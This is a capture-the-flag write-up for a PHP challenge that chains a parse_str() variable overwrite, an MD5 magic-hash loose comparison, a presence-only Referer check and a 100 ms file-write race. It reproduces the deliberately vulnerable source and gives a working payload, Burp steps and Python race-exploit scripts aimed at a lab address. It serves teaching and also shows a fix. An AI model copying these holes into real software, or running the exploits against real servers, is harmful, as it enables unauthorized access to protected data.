Exercise Record
Reproduce the code:
index.php
<?php
$a = "hongri";
$id = $_GET['id'];
// parse_str() with a single argument registers every key of the query
// string as a local variable, so ?id=a[0]=... silently overwrites $a.
@parse_str($id);
// Loose comparison of two md5 hex strings: md5('QNKCDZO') is "0e830...",
// a numeric string, so any other "0e<digits>" digest compares equal under ==.
if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')) {
    echo '<a href="flag.php">flag is here</a>';
}
?>
flag.php
// flag.php
<?php
header("Content-type:text/html;charset=utf-8");
$referer = $_SERVER['HTTP_REFERER'];
// Only the presence of a Referer header is checked, never its value.
if(isset($referer)!== false) {
    // Per-client directory derived from the request IP: deterministic, so predictable.
    $savepath = "uploads/" . sha1($_SERVER['REMOTE_ADDR']) . "/";
    if (!is_dir($savepath)) {
        $oldmask = umask(0);
        mkdir($savepath, 0777);
        umask($oldmask);
    }
    if ((@$_GET['filename']) && (@$_GET['content'])) {
        //$fp = fopen("$savepath".$_GET['filename'], 'w');
        // The flag sits on disk for the 100 ms between the two writes;
        // note that filename goes into the path unfiltered (only the message is escaped).
        $content = 'HRCTF{y0u_n4ed_f4st} by:l1nk3r';
        file_put_contents("$savepath" . $_GET['filename'], $content);
        $msg = 'Flag is here,come on~ ' . $savepath . htmlspecialchars($_GET['filename']) . "";
        usleep(100000);
        $content = "Too slow!";
        file_put_contents("$savepath" . $_GET['filename'], $content);
    }
    print <<<EOT
<form action="" method="get">
<div class="form-group">
<label for="exampleInputEmail1">Filename</label>
<input type="text" class="form-control" name="filename" id="exampleInputEmail1" placeholder="Filename">
</div>
<div class="form-group">
<label for="exampleInputPassword1">Content</label>
<input type="text" class="form-control" name="content" id="exampleInputPassword1" placeholder="Contont">
</div>
<button type="submit" class="btn btn-default">Submit</button>
</form>
EOT;
}
else{
    echo 'you can not see this page';
}
?>
Vulnerability analysis:
Open the site:
http://10.211.55.5/PHPcode/day7/index.php
The page loads normally, so we can work with it.
In index.php, line 4 contains @parse_str($id);. Called with a single argument, parse_str() does not check whether a variable of that name already exists: it registers every key of the incoming query string as a local variable, and if a variable with the same name (here $a) is already defined, it is simply overwritten. Line 6 then performs the check:
if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')) {
PHP's loose hash comparison (==) is flawed: a string of the form 0e followed only by digits is a numeric string in scientific notation, and PHP evaluates it to 0. So if two different inputs both hash to a value beginning with 0e, PHP treats both hashes as the number 0 and considers them equal. Here md5('QNKCDZO') is 0e830400451993494058024219903391, and md5('s878926199a') is also of the form 0e<digits>, so the payload is ?id=a[0]=s878926199a: $a[0] != 'QNKCDZO' holds, and md5($a[0]) == md5('QNKCDZO') holds as well. The link is then echoed on the page:
http://10.211.55.5/PHPcode/day7/?id=a[0]=s878926199a
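As an added example (not part of the original write-up), the following Python model of PHP's loose string comparison shows why s878926199a passes the check in index.php and why a strict, constant-time comparison would not. The NUMERIC regex is my approximation of PHP's "numeric string" rule (whitespace, optional sign, digits, optional fraction and exponent); the function and constant names are mine. Note that PHP 8 changed int-vs-string comparisons but still compares two numeric strings numerically, so this bypass is not fixed by upgrading alone.

```python
import hashlib
import hmac
import re

TARGET = "QNKCDZO"

# Approximation (mine) of PHP's "numeric string": optional whitespace and sign,
# digits with optional fraction, optional exponent. "0e830400..." matches and
# is the number 0 * 10^830400..., i.e. 0.
NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def md5hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def is_magic_hash(h):
    """True if the hex digest is '0e' followed only by digits, i.e. a
    numeric string that PHP evaluates to float(0)."""
    return re.fullmatch(r"0e\d+", h) is not None


def php_loose_eq(a, b):
    """Model of PHP's == on two strings: if both are numeric strings they are
    compared as numbers (PHP 5, 7 and 8 alike), otherwise byte for byte."""
    if NUMERIC.match(a) and NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def vulnerable_check(candidate):
    """Model of index.php: $a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')."""
    return candidate != TARGET and php_loose_eq(md5hex(candidate), md5hex(TARGET))


def hardened_check(candidate):
    """Same intent written with === / hash_equals(): digests are compared
    byte for byte in constant time, so only the exact preimage matches."""
    return candidate != TARGET and hmac.compare_digest(md5hex(candidate), md5hex(TARGET))


if __name__ == "__main__":
    for c in ("s878926199a", "hongri"):
        print(c, md5hex(c), "magic" if is_magic_hash(md5hex(c)) else "plain",
              "loose:", vulnerable_check(c), "strict:", hardened_check(c))
```

Running it shows the two 0e digests comparing equal under the loose model while hmac.compare_digest (PHP's hash_equals()) rejects them; the fix in the real code is `===` or hash_equals(), not a different input filter.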
Click the link to enter flag.php; this is where the real point of the challenge lies. Lines 3 and 4 of flag.php read:
$referer = $_SERVER['HTTP_REFERER'];
if(isset($referer)!== false) {
This is a Referer check: it only tests whether a Referer header is present. If it is, the upload form is shown; if not, the page returns "you can not see this page". As we know, following a link in an <a> tag makes the browser send a Referer header automatically, so the response differs depending on whether the Referer is carried or not. When replaying the request from a tool, any Referer value will do, since only its presence is checked.
With Referer:
Without Referer:
Lines 13 to 18 of flag.php then contain the following code:
$content = 'HRCTF{y0u_n4ed_f4st} by:l1nk3r';
file_put_contents("$savepath" . $_GET['filename'], $content);
$msg = 'Flag is here,come on~ ' . $savepath . htmlspecialchars($_GET['filename']) . "";
usleep(100000);
$content = "Too slow!";
file_put_contents("$savepath" . $_GET['filename'], $content);
The key is usleep(100000): the flag is written to the file first, the script sleeps for 100 ms, and only then is the file overwritten with "Too slow!". If we read the file before the second write lands we get the flag, so this is a race condition with a 100 ms window. The directory path is also predictable: it is uploads/sha1(REMOTE_ADDR)/, fixed for a given client IP, so we know exactly where the file will appear. Simply requesting the file afterwards returns "Too slow!".
So the solution is: open Burp Intruder with 200 threads and keep sending
http://10.211.55.5/PHPcode/day7/flag.php?filename=flag&content=111
(the replayed request must still carry a Referer header, otherwise the check above fails). Before starting the attack, run a script that continuously requests the written file:
http://10.211.55.5/PHPcode/day7/uploads/57f26b8080252f52910b7ed53b7eefb0b17189a8/flag
Script code:
import requests as r

URL = "http://10.211.55.5/PHPcode/day7/uploads/57f26b8080252f52910b7ed53b7eefb0b17189a8/flag"
r1 = r.Session()
# Poll the file as fast as possible; while Burp keeps triggering flag.php,
# some reads land inside the 100 ms window before "Too slow!" is written.
while True:
    r2 = r1.get(URL)
    print(r2.text)
    if "HRCTF{" in r2.text:
        break
Run the Intruder attack and the polling script at the same time; some of the reads hit the window and the flag appears in the script's output.
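As an added example, not the author's script, here is a single program that runs both halves of the race described above: several threads keep triggering flag.php's write/usleep/overwrite sequence while one thread polls the written file and stops at the first body containing the flag prefix. The URLs and directory hash are the ones from the write-up; the Referer value is arbitrary, since flag.php only checks that the header exists. The VulnerableServer class is a constructed local stand-in for flag.php so the race logic can be run and checked offline; against the real target you pass the two HTTP functions instead.

```python
import hashlib
import os
import tempfile
import threading
import time

TRIGGER_URL = "http://10.211.55.5/PHPcode/day7/flag.php"
UPLOAD_URL = ("http://10.211.55.5/PHPcode/day7/uploads/"
              "57f26b8080252f52910b7ed53b7eefb0b17189a8/flag")
FLAG_PREFIX = "HRCTF{"


def upload_dir(remote_addr):
    """Reproduce flag.php's $savepath: it depends only on the client IP, so an
    attacker who knows their own address can predict where the file lands."""
    return "uploads/" + hashlib.sha1(remote_addr.encode()).hexdigest() + "/"


def race(trigger, read, writers=8, timeout=10.0):
    """Run `writers` threads calling trigger() in a loop and one thread calling
    read() in a loop. Return the first body containing FLAG_PREFIX, or None if
    nothing was caught within `timeout` seconds."""
    stop = threading.Event()
    hits = []

    def writer():
        while not stop.is_set():
            trigger()

    def reader():
        while not stop.is_set():
            body = read()
            if body and FLAG_PREFIX in body:
                hits.append(body)
                stop.set()

    threads = [threading.Thread(target=writer, daemon=True) for _ in range(writers)]
    threads.append(threading.Thread(target=reader, daemon=True))
    for t in threads:
        t.start()
    stop.wait(timeout)
    stop.set()
    for t in threads:
        t.join(timeout=1.0)
    return hits[0] if hits else None


def http_trigger():
    """One request that makes flag.php write the flag, sleep 100 ms, overwrite."""
    import requests  # imported lazily so the offline demo has no network dependency
    requests.get(TRIGGER_URL,
                 params={"filename": "flag", "content": "111"},
                 headers={"Referer": TRIGGER_URL},  # any value; only presence is checked
                 timeout=5)


def http_read():
    """Fetch the written file; None while it does not exist yet."""
    import requests
    resp = requests.get(UPLOAD_URL, timeout=5)
    return resp.text if resp.status_code == 200 else None


class VulnerableServer:
    """Constructed local model of flag.php's write/usleep/overwrite sequence,
    used only so the race can be demonstrated offline."""

    def __init__(self, path):
        self.path = path

    def trigger(self):
        with open(self.path, "w") as f:
            f.write("HRCTF{y0u_n4ed_f4st} by:l1nk3r")
        time.sleep(0.1)  # usleep(100000)
        with open(self.path, "w") as f:
            f.write("Too slow!")

    def read(self):
        try:
            with open(self.path) as f:
                return f.read()
        except FileNotFoundError:
            return None


def demo_local():
    """Win the race against the local model and return the captured flag text."""
    path = os.path.join(tempfile.mkdtemp(), "flag")
    server = VulnerableServer(path)
    return race(server.trigger, server.read, writers=4, timeout=10.0)


if __name__ == "__main__":
    print(demo_local())
    # Against the real target: print(race(http_trigger, http_read, writers=50))
```

The trigger side is what Burp's 200 threads did in the write-up and the reader side is the polling script; keeping the writers busy matters more than raw reader speed, because each trigger reopens a 100 ms window during which any single read succeeds.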